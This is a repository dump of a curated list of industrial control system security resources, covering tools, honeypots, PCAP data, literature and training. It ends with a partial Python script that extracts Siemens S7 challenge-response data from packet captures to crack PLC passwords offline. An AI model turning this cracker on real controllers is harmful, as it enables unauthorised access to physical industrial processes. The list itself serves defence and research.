├── .github └── workflows │ └── links.yml ├── CONTRIBUTING.md ├── LICENSE ├── README.md └── source ├── s7-brute-offline.py └── s7-cracker.py /.github/workflows/links.yml: -------------------------------------------------------------------------------- 1 | name: Links 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | pull_request: 8 | branches: 9 | - main 10 | workflow_dispatch: 11 | # repository_dispatch: 12 | # workflow_dispatch: 13 | # schedule: 14 | # - cron: "00 18 * * *" 15 | 16 | jobs: 17 | linkChecker: 18 | runs-on: ubuntu-latest 19 | steps: 20 | - uses: actions/checkout@v2 21 | - name: Link Checker 22 | id: lychee 23 | uses: lycheeverse/lychee-action@v1.0.8 24 | with: 25 | args: --verbose --no-progress **/*.md **/*.html 26 | env: 27 | GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}} 28 | - name: Fail if there were link errors 29 | run: exit ${{ steps.lychee.outputs.exit_code }} 30 | 31 | # - name: Create Issue From File 32 | # uses: peter-evans/create-issue-from-file@v2 33 | # with: 34 | # title: Link Checker Report 35 | # content-filepath: ./lychee/out.md 36 | # labels: report, automated issue -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contribution Guidelines 2 | 3 | Please ensure your pull request adheres to the following guidelines: 4 | 5 | - Make sure your submission is not a duplicate. 6 | - Make an individual pull request for each suggestion. 7 | - Adhere to the table formatting, which makes for easier reading. 8 | - The pull request and commit should have a useful title. 9 | 10 | Thanks for your suggestions! 11 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # awesome-industrial-control-system-security 2 | A curated list of resources related to Industrial Control System (ICS) security. 3 | 4 | Feel free to [contribute](CONTRIBUTING.md). 5 | 6 | 7 | ## Tools 8 | 9 | 10 | 11 | 14 | 19 | 20 | 21 | 24 | 27 | 28 | 29 | 32 | 38 | 39 | 40 | 43 | 46 | 47 | 48 | 51 | 54 | 55 | 56 | 59 | 62 | 63 | 64 | 67 | 70 | 71 | 72 | 75 | 78 | 79 | 80 | 83 | 86 | 87 | 88 | 91 | 95 | 96 | 97 | 100 | 103 | 104 | 105 | 108 | 111 | 112 | 113 | 116 | 119 | 120 | 121 | 124 | 127 | 128 | 129 | 132 | 137 | 138 | 139 | 142 | 145 | 146 | 147 | 150 | 153 | 154 | 155 | 158 | 162 | 163 | 164 | 167 | 170 | 171 | 172 | 175 | 178 | 179 | 180 | 183 | 186 | 187 | 188 | 191 | 194 | 195 | 196 | 199 | 202 | 203 | 204 | 207 | 210 | 211 | 212 | 215 | 218 | 219 | 220 | 223 | 226 | 227 | 228 | 231 | 234 | 235 |
12 | CSET 13 | 15 | The Cyber Security Evaluation Tool (CSET®) assists organizations in protecting their key national cyber assets. 16 | This tool provides users with a systematic and repeatable approach for assessing the security posture of their cyber systems and networks. 17 | It includes both high-level and detailed questions related to all industrial control and IT systems.​ 18 |
22 | Digital Bond's 3S CoDeSys Tools 23 | 25 | Digital Bond created three tools for interacting with PLCs that run CoDeSys, consisting of a command shell, file transfer and NMap script. 26 |
30 | Digital Bond's ICS Enumeration Tools 31 | 33 | Redpoint is a Digital Bond research project to enumerate ICS applications and devices using nmap extensions. 34 | It can be used during assessments to discover ICS devices and pull information that would be helpful in secondary testing. 35 | The Redpoint tools use legitimate protocol or application commands to discover and enumerate devices and applications. 36 | There is no effort to exploit or crash anything, but be wise and careful. 37 |
41 | GRASSMARLIN 42 | 44 | GRASSMARLIN provides IP network situational awareness of industrial control systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks to support network security. Passively map, and visually display, an ICS/SCADA network topology while safely conducting device discovery, accounting, and reporting on these critical cyber-physical systems. 45 |
49 | ics_mem_collect 50 | 52 | Memory collector for GE D20MX. The project itself can be extended to work with other devices. 53 |
57 | ISF 58 | 60 | The Industrial Exploitation Framework (ISF) is an exploitation framework similar to Metasploit written in Python. It is based on the open source Routersploit tool. It contains exploits for several types of controllers, such as QNX, Siemens and Schneider devices and includes several scanners. 61 |
65 | ISEF 66 | 68 | The Industrial Security Exploitation Framework (ISEF) is an exploitation framework based on the Equation Group Fuzzbunch toolkit as released by Shadow Brokers. It's developed by the ICSMASTER Security Team. 69 |
73 | ꓘamerka GUI 74 | 76 | Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. 77 |
81 | mbtget 82 | 84 | mbtget - Simple perl script for make some modbus transaction from the command line. 85 |
89 | MiniCPS 90 | 92 | MiniCPS: A toolkit for security research on Cyber-Physical 93 | Systems from Singapore University of Technology and Design (SUTD). 94 |
98 | MODBUS Penetration Testing Framework 99 | 101 | smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. The framework can be used to perform vulnerability assessments. 102 |
106 | ModbusPal 107 | 109 | ModbusPal is a MODBUS slave simulator. Its purpose is to offer an easy to use interface with the capabilities to reproduce complex and realistic MODBUS environments. 110 |
114 | ModScan 115 | 117 | ModScan is a new tool designed to map a SCADA MODBUS TCP based network. 118 |
122 | NetToPLCSim 123 | 125 | TCP/IP-Network extension for the PLC simulation software Siemens PLCSim. 126 |
130 | OpenDNP3 131 | 133 | OpenDNP3 is the de facto reference implementation of IEEE-1815 (DNP3) provided under the Apache License. 134 | It is currently in maintenance-only mode and new features are no longer being added. 135 | Automatak has rebranded as Step Function I/O and is now focused on writing protocol libraries in Rust. 136 |
140 | PLCinject 141 | 143 | PLCinject can be used to inject code into PLCs. 144 |
148 | plcscan 149 | 151 | Tool for scaning PLC devices over the s7comm or modbus protocol. 152 |
156 | Quickdraw IDS 157 | 159 | The Quickdraw IDS project by Digital Bond includes Snort rules for SCADA devices and so-called preprocessors for network traffic. 160 | The preprocessors provide significant additional value because of their ability to reconstruct the protocol and state for use by Snort. 161 |
165 | S7Comm-Analyzer 166 | 168 | A plugin for Bro that parses S7comm protocol data traffic. 169 |
173 | SCADAShutdownTool 174 | 176 | SCADAShutdownTool is an industrial control system automation and testing tool allows security researchers and experts to test SCADA security systems, enumerate slave controllers, read controller's registers values and rewrite registers data. 177 |
181 | sixnet-tools 182 | 184 | Tool for exploiting Sixnet RTUs. This simple command line interface allows using undocumented function codes to gain root access anc control the underlying Linux OS on certain Sixnet family industrial control devices. 185 |
189 | Snap7 190 | 192 | Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens S7 PLCs. The new CPUs 1200/1500, the old S7200, the small LOGO 0BA7/0BA8 and SINAMICS Drives are also partially supported. 193 |
197 | s7scan 198 | 200 | A tool written in Python that scans networks, enumerates Siemens PLCs and gathers basic information about them, such as PLC firmware and hardware version, network configuration and security parameters. 201 |
205 | S7 Password Bruteforcer 206 | 208 | A tool to bruteforce the password used by S7 instances from a PCAP using a dictionary. Original created by SCADAStrangelove. 209 |
213 | splonebox 214 | 216 | splonebox is an open source network assessment tool with focus on modularity. It offers an ongoing analysis of a network and its devices. One major design decision features development of custom plugins, including ones for industrial communication protocols. 217 |
221 | Wireshark 222 | 224 | Wireshark is the world's foremost network protocol analyzer. It lets you see what's happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. It has support for many protocols used in ICS. 225 |
229 | PCS7-Hardening-Tool 230 | 232 | A standalone PowerShell script that enumerates security issues on Siemens PCS 7 DCS servers, based on Siemens security guides. created by OTORIO 233 |
236 | 237 | ## Distributions 238 | 239 | 240 | 241 | 244 | 247 | 248 | 249 | 252 | 255 | 256 |
242 | Moki Linux 243 | 245 | Moki is a modification of Kali to encorporate various ICS/SCADA Tools scattered around the internet, to create a customized Kali Linux geared towards ICS/SCADA pentesting professionals. 246 |
250 | ControlThings Platform(Previously SamuraiSTFU) 251 | 253 | The ControlThings Platform is an open source linux distribution for ICS cyber security teams. It takes the best-in-breed security assessment tools for traditional IT infrastructures and adds specialized tools for embedded electronics, proprietary wireless, and a healthy dose of ICS specific assessment tools, both from the community and custom tools created by the ControlThings I/O teams. 254 |
257 | 258 | ## Honeypots 259 | 260 | 261 | 262 | 265 | 270 | 271 | 272 | 275 | 278 | 279 | 280 | 283 | 287 | 288 |
263 | Conpot 264 | 266 | Conpot is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend. 267 | It features easy customization and and behaviour mimicking, amongst others, and can be extended with real HMIs. 268 | Built and maintained under the Honeynet project. 269 |
273 | GasPot 274 | 276 | GasPot is a honeypot that has been designed to simulate a Veeder Root Gaurdian AST. These Tank Gauges are common in the oil and gas industry for Gas Station tanks to help with Inventory of fuels. GasPot was designed to randomize as much as possible so no two instances look exactly the same. 277 |
281 | T-Pot 282 | 284 | T-Pot is a combination of several honeypots that run in docker containers. Suricata and the ELK stack are used for security monitoring and visualization. 285 | Amongst others, it features Conpot and eMobility, which are an ICS and next generation transport infrastructure honeypots. 286 |
289 | 290 | ## Data 291 | 292 | 293 | 294 | 297 | 300 | 301 | 302 | 305 | 308 | 309 | 310 | 313 | 316 | 317 | 318 | 321 | 324 | 325 | 326 | 329 | 332 | 333 | 334 | 337 | 340 | 341 | 342 | 345 | 348 | 349 | 350 | 353 | 356 | 357 | 358 | 361 | 364 | 365 | 366 |
295 | 4SICS ICS Lab PCAPS 296 | 298 | The "Geek Lounge" at 4SICS contains an ICS lab with PLCs, RTUs, servers, industrial network equipment (switches, firewalls, etc). These devices are available for hands-on "testing" by 4SICS attendees and traffic has been captured from these. 299 |
303 | DEF CON 23 ICS Village PCAPS 304 | 306 | PCAPS from the 23rd DEF CON. 307 |
311 | ICS Map 312 | 314 | A map created from data gathered by Shodan showing ICS devices. Data is made available for further analysis. 315 |
319 | ICS PCAP Collection by Jason Smith 320 | 322 | A collection of PCAPs for various ICS utilities and protocols. 323 |
327 | ICS Radar 328 | 330 | Data gathered from several types of ICS protocols by Shodan visualized on a globe. 331 |
335 | S4x15 ICS Village 336 | 338 | Mirror for the PCAPS from the S4x15 CTF as used during the contest. 339 |
343 | S7 PCAP samples 344 | 346 | Sample files for Wireshark S7 protocol dissector plugin. 347 |
351 | SCADAPASS 352 | 354 | The famous SCADA StrangeLove Default/Hardcoded Passwords List. 355 |
359 | TRISIS/TRITON/HATMAN malware repository 360 | 362 | Repository containting original and decompiled files of TRISIS/TRITON/HATMAN malware targeting Triconex Safety Instrumented System (SIS) controllers. 363 |
367 | 368 | ## Frameworks 369 | 370 | 371 | 372 | 375 | 378 | 379 |
373 | I-ISMS 374 | 376 | The Industrial Information Security Management System (I-ISMS) can be used to rapidly deploy an information security management program in an industrial setting. It provides templates for creating and implementing a program starting from the basics. 377 |
380 | 381 | ## Feeds and News 382 | 383 | 384 | 385 | 388 | 391 | 392 | 393 | 396 | 399 | 400 | 401 | 404 | 407 | 408 | 409 | 412 | 415 | 416 | 417 | 420 | 423 | 424 | 425 | 428 | 431 | 432 |
386 | ICS-CERT Alerts 387 | 389 | The ICS-CERT Alert feed is intended to provide timely notification to critical infrastructure owners and operators concerning threats or activity with the potential to impact critical infrastructure computing networks. 390 |
394 | ICS-CERT RSS Feed 395 | 397 | The RSS feed by the United States ICS-CERT lists news and newly released vulnerability advisories. 398 |
402 | Industrial Security Alerts 403 | 405 | Siemens provides alerts for its industrial systems via this page and RSS feed. 406 |
410 | North American Electric Reliability Corporation (NERC) Alerts 411 | 413 | NERC provides alerts for Bulk Electric System (BES) security advisories and industry recommendations. 414 |
418 | ABB Cybersecurity Alerts and Notifications 419 | 421 | ABB provides alerts for its cyber security incidents and software vulnerabilities. 422 |
426 | Schneider Electric Cybersecurity Alerts and Notifications 427 | 429 | Get the latest updates and alerts on Cyber Security and Compliance from Schneider Electric Software. 430 |
433 | 434 | 435 | 436 | ## Conferences and Conference Material 437 | 438 | 439 | 440 | 443 | 446 | 447 | 448 | 451 | 454 | 455 | 456 | 459 | 462 | 463 | 464 | 467 | 470 | 471 | 472 | 475 | 478 | 479 |
441 | CS3STHLM 442 | 444 | the Stockholm international summit on Cyber Security in SCADA and Industrial Control Systems - is an annual summit that gather the most important stakeholders across critical processes and industries. CS3STHLM has been organized since 2014, and has quickly become the premier ICS Security Summit in Northern Europe. 445 |
449 | CS4CA 450 | 452 | Cyber Security for Critical Assets is a global series of summits focusing on cyber security for critical infrastructure. 453 |
457 | SANS ICS Summit Archives 458 | 460 | Central repository for the presentation material for the SANS ICS Summits held worldwide (interleaved with other summits). 461 |
465 | SANS ICS Cybersecurity Conference (WeissCon) 466 | 468 | Affectionately known as WeissCon after it’s founder Joe Weiss, the conference is now owned and operated by SecurityWeek and usually runs in October at different locations each year in the US. 469 |
473 | Kaspersky Industrial Cybersecurity conference (KICS con) 474 | 476 | An annual international industrial cybersecurity conference run by Kaspersky. 477 |
480 | 481 | ## Literature 482 | 483 | 484 | 485 | 488 | 491 | 492 | 493 | 497 | 500 | 501 | 502 | 505 | 508 | 509 | 510 | 513 | 516 | 517 | 518 | 521 | 524 | 525 | 526 | 529 | 532 | 533 | 534 | 537 | 540 | 541 | 542 | 545 | 548 | 549 | 550 | 553 | 556 | 557 | 558 | 561 | 564 | 565 | 566 | 569 | 572 | 573 | 574 | 577 | 580 | 581 | 582 | 585 | 588 | 589 | 590 | 593 | 596 | 597 | 598 | 601 | 604 | 605 | 606 | 609 | 612 | 613 |
486 | ATT&CK® for Industrial Control Systems by MITRE 487 | 489 | ATT&CK for ICS is a knowledge base useful for describing the actions an adversary may take while operating within an ICS network. 490 |
494 | Library of Resources for 495 | Industrial Control System Cyber Security 496 | 498 | SCADAhacker.com's ultimate list of ICS/SCADA cybersecurity resources. 499 |
503 | Applied Cyber Security and the Smart Grid 504 | 506 | Applied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure by Eric D. Knapp and Raj Samani. 507 |
511 | A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity 512 | 514 | Robert M. Lee's thoughts on some good resources on ICS & SCADA security. 515 |
519 | Hacker Machine Interface - The State of SCADA HMI Vulnerabilities 520 | 522 | A TrendLabs Research Paper from the Trend Micro Zero Day Initiative Team about the current state of SCADA and HMI security. 523 |
527 | Handbook of SCADA/Control Systems Security 528 | 530 | This comprehensive handbook covers fundamental security concepts, methodologies, and relevant information pertaining to supervisory control and data acquisition (SCADA) and other industrial control systems used in utility and industrial facilities worldwide. 531 |
535 | SCADA Cybersecurity Framework 536 | 538 | Paper describing what a SCADA Cyber Security framework should consist of. 539 |
543 | Industrial Network Security, Second Edition 544 | 546 | Industrial Network Security, Second Edition: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems by Eric D. Knapp and Joel Thomas Langill. 547 |
551 | Power System SCADA and Smart Grids 552 | 554 | The book brings together in one concise volume the fundamentals and possible application functions of power system supervisory control and data acquisition (SCADA). Not security-oriented and geared towards power systems, but a good primer into SCADA nonetheless. 555 |
559 | NIST SP 800-82, Revision 2 560 | 562 | Guide to Industrial Control Systems (ICS) Security by NIST. 563 |
567 | The Industrial Control System Cyber Kill Chain 568 | 570 | This SANS paper describes the ICS Cyber Kill Chain. It tailors the Lockheed Martin Kill Chain to typical, two phase attacks on ICS systems. 571 |
575 | An Abbreviated History of Automation, Industrial Control Systems, and Cybersecurity 576 | 578 | This SANS paper looks at the background on ICS cybersecurity. Well worth the read to make sure you understand many of the events that have occurred over the past twenty years and how they’ve inspired security in ICS today. 579 |
583 | Control Engineering - Networking and Security - CyberSecurity 584 | 586 | Control Engineering magazine's cybersecurity news and literature. 587 |
591 | Operational Technology Cyber Security Incidents Ontology (OT-CSIO) 592 | 594 | OT-CSIO, created by FireEye, is an ontology to understand, cross-compare and assess cyber security incidents related to operational technology. It provides guidance for assessing risks and helps making informed decisions. 595 |
599 | CIS Controls Implementation Guide for Industrial Control Systems - Version 7 600 | 602 | This document provides guidance on how to apply the security best practices found in CIS Controls Version 7.1 to ICS environments. 603 |
607 | CIS Controls Internet of Things Companion Guide - Version 7.1 608 | 610 | The objective of this document is to have broad applicability across sectors. IoT affects all areas of computingacross multiple sectors, such as healthcare, aviation, public safety, and energy. This has led to sector-specific IoT security guidance, but this document is purposefully sector-agnostic. 611 |
614 | 615 | 616 | ## Education 617 | 618 | 619 | 620 | 623 | 626 | 627 | 628 | 631 | 634 | 635 |
621 | GRFICSv2 622 | 624 | The second version of the Graphical Realism Framework for Industrial Control Simulations (GRFICS) is a framework for realistic industrial control simulations that uses Unity 3D game engine for simulating industrial control systems. GRFICS provides users with a full virtual industrial control system (ICS) network to practice common attacks including command injection, man-in-the-middle, and buffer overflows, and visually see the impact of their attacks in the 3D visualization. Users can also practice their defensive skills by properly segmenting the network with strong firewall rules, or writing intrusion detection rules. The first version can be found here. 625 |        
629 | LICSTER 630 | 632 | LICSTER, the Low-cost ICS Security Testbed for Education and Research, aims to help setup a minimal, low-cost Industrial Control System (ICS) testbest for students, researchers, or anyone with an interest in industrial security. The project contains a list of affordable hardware to build the minimalistic ICS with, instructions, configurations and installation scripts to instantiate the system as well as various attacker scenarios and their implications. The paper can be found here. 633 |        
636 | 637 | ## Introduction to ICS, SCADA, & PLCs 638 | 639 | 640 | 641 | 644 | 647 | 648 | 649 | 652 | 655 | 656 | 657 | 660 | 663 | 664 | 665 | 668 | 671 | 672 | 673 | 676 | 679 | 680 | 681 | 684 | 687 | 688 | 689 | 692 | 695 | 696 | 697 | 700 | 703 | 704 | 705 | 708 | 711 | 712 | 713 | 716 | 719 | 720 | 721 | 724 | 727 | 728 |
642 | PLC Training Org 643 | 645 | Site organizes all essential topics related to PLC training up to SCADA systems. While security is interwoven within the 10 learning phases, this is a great security article on the site for those just starting out. 646 |        
650 | Control System Basics 651 | 653 | YouTube video explaining control system basics including the type of logic these systems use to sense and create physical changes to take action upon. 654 |        
658 | SCADA Systems - Utility 101 Session with Rusty Wiliiams 659 | 661 | Utility industry professional Rusty Williams explains SCADA from an electric utility perspective. 662 |        
666 | Control System Lectures 667 | 669 | Brian Douglas YouTube video series where he covers a wide range of topics on control systems in a very easy to process way. 670 |        
674 | The PLC Professor 675 | 677 | The PLC Professor and his website plcprofessor.com contains a lot of great resources for learning what programmable logic controllers (PLCs) and other types of control systems and their logic are and how they work. 678 |        
682 | Serial Communications RS232 and RS485 683 | 685 | John Rinaldi of Real Time Automation describes Serial communications RS232 and RS485. 686 |        
690 | All You Need To Know About MODBUS-RTU 691 | 693 | John Rinaldi of Real Time Automation describes MODBUS-RTU. 694 |        
698 | MODBUS Data Structures 699 | 701 | John Rinaldi of Real Time Automation describes MODBUS data structures. 702 |        
706 | All You Need to Know About MODBUS-TCP 707 | 709 | John Rinaldi of Real Time Automation describes MODBUS-TCP. 710 |        
714 | How Ethernet TCP/IP is Used by Industrial Protocols 715 | 717 | John Rinaldi of Real Time Automation describes Ethernet TCP/IP. 718 |        
722 | RealPars 723 | 725 | The RealPars YouTube channel has many videos on industrial automation and PLC programming. 726 |        
729 | 730 | ## License 731 | 732 | Licensed under [Apache License 2.0](LICENSE). 733 | -------------------------------------------------------------------------------- /source/s7-brute-offline.py: -------------------------------------------------------------------------------- 1 | """ 2 | As posted on: http://pastebin.com/0G9Q2k6y 3 | 4 | File: s7-brute-offline.py 5 | Desc: offline password bruteforsing based on challenge-response data, extracted from auth traffic dump file 6 | 7 | Alexander Timorin, Dmitry Sklyarov 8 | http://scadastrangelove.org 9 | 10 | Version: 0.1 (just for demo, don't kick my ass plz) 11 | """ 12 | 13 | import sys 14 | import hashlib 15 | import hmac 16 | from binascii import hexlify 17 | try: 18 | from scapy.all import * 19 | except ImportError: 20 | print "please install scapy: http://www.secdev.org/projects/scapy/ " 21 | sys.exit() 22 | 23 | 24 | cfg_pcap_file = '/root/siemens/RE_S7/stop_cpu_cmd_right_pass_123.pcap' 25 | cfg_dictionary_file = 'dict.txt' 26 | 27 | def get_challenge_response(): 28 | r = rdpcap(cfg_pcap_file) 29 | 30 | lens = map(lambda x: x.len, r) 31 | pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))]) 32 | 33 | # try to find challenge packet 34 | pckt_108 = 0 #challenge packet (from server) 35 | for (pckt_indx, pckt_len) in pckt_lens.items(): 36 | if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] == '7202002732': 37 | pckt_108 = pckt_indx 38 | break 39 | 40 | # try to find response packet 41 | pckt_141 = 0 #response packet (from client) 42 | _t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ]) 43 | for pckt_indx in sorted(_t1.keys()): 44 | pckt_len = _t1[pckt_indx] 45 | if pckt_len+14 == 141 and hexlify(r[pckt_indx].load)[14:24] == '7202004831': 46 | pckt_141 = pckt_indx 47 | break 48 | 49 | # try to find auth result packet 50 | pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok 51 | pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad 52 | for pckt_indx in sorted(_t1.keys()): 53 | pckt_len = _t1[pckt_indx] 54 | if pckt_len+14 == 84 and hexlify(r[pckt_indx].load)[14:24] == '7202000f32': 55 | pckt_84 = pckt_indx 56 | break 57 | if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] == '7202001732': 58 | pckt_92 = pckt_indx 59 | break 60 | 61 | print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d, pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92) 62 | if pckt_84: 63 | print "auth ok" 64 | else: 65 | print "auth bad. for brute we need right auth result. exit" 66 | sys.exit() 67 | 68 | challenge = None 69 | response = None 70 | 71 | raw_challenge = hexlify(r[pckt_108].load) 72 | if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00': 73 | challenge = raw_challenge[52:92] 74 | print "found challenge: %s" % challenge 75 | else: 76 | print "cannot find challenge. exit" 77 | sys.exit() 78 | 79 | raw_response = hexlify(r[pckt_141].load) 80 | if raw_response[64:70] == '100214' 